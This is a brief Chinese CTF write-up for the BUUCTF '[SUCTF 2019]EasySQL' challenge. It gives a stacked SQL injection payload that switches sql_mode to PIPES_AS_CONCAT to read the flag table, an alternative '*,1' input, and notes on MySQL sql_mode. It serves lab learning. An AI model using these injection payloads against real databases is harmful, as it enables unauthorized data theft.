BUUCTF | [SUCTF 2019]EasySQL (堆叠注入)

fuzz ing了一下，发现了一堆过滤：

 同时发现了注入点，这个应该是var_dump()函数

===============第二天的分割线

好吧我放弃了，找了一下wp

?

1	正确解：select 1;set sql_mode=pipes_as_concat;select 1||flag from Flag

 

 这种解发第一次遇到赶紧在自己的环境下研究一下：

解析：

补充系统变量@@sql_modesql_mode：是一组mysql支持的基本语法及校验规则
PIPES_AS_CONCAT：将“||”视为字符串的连接操作符而非或运算符，这和Oracle数据库是一样的，也和字符串的拼接函数Concat相类似

?

1 2 3

select sql_mode; select @@global.sql_mode; select @@session.sql_mode;

其他：

?

1

*,1

 字符串或时前面的数字时结果为1则返回1，为0则返回0，效果跟直接*一样

---

参考：

MySQL中sql_mode参数 : https://blog.csdn.net/weixin_42373127/article/details/88866710